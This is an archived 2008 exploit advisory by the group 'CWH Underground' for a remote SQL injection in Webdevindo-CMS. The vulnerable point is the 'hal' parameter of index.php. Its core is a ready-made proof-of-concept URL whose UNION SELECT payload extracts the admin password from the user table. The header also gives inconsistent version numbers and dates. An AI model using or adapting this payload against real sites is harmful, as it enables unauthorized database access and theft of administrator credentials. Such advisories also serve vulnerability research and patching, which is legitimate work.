id: 3290
date: 06/24/2008
title: Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability
author: CWH Underground
cves: 

=====================================================================
Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability
=====================================================================



  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 25 June 2008


#####################################################
 APPLICATION : Webdevindo-CMS 
 VERSION     : 1.0.0
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/webdevindo-cms
#####################################################

--- Remote SQL Injection ---

---------
 Exploit
---------

[+] http://[Target]/[webdevindo_path]/index.php?hal=[SQL Injection]

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/webdevindo/index.php?hal=-99999'/**/union/**/select/**/Password/**/from/**/jos_user/**/where/**/LoginName='admin


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################



#  0day.today [2023-03-24]  #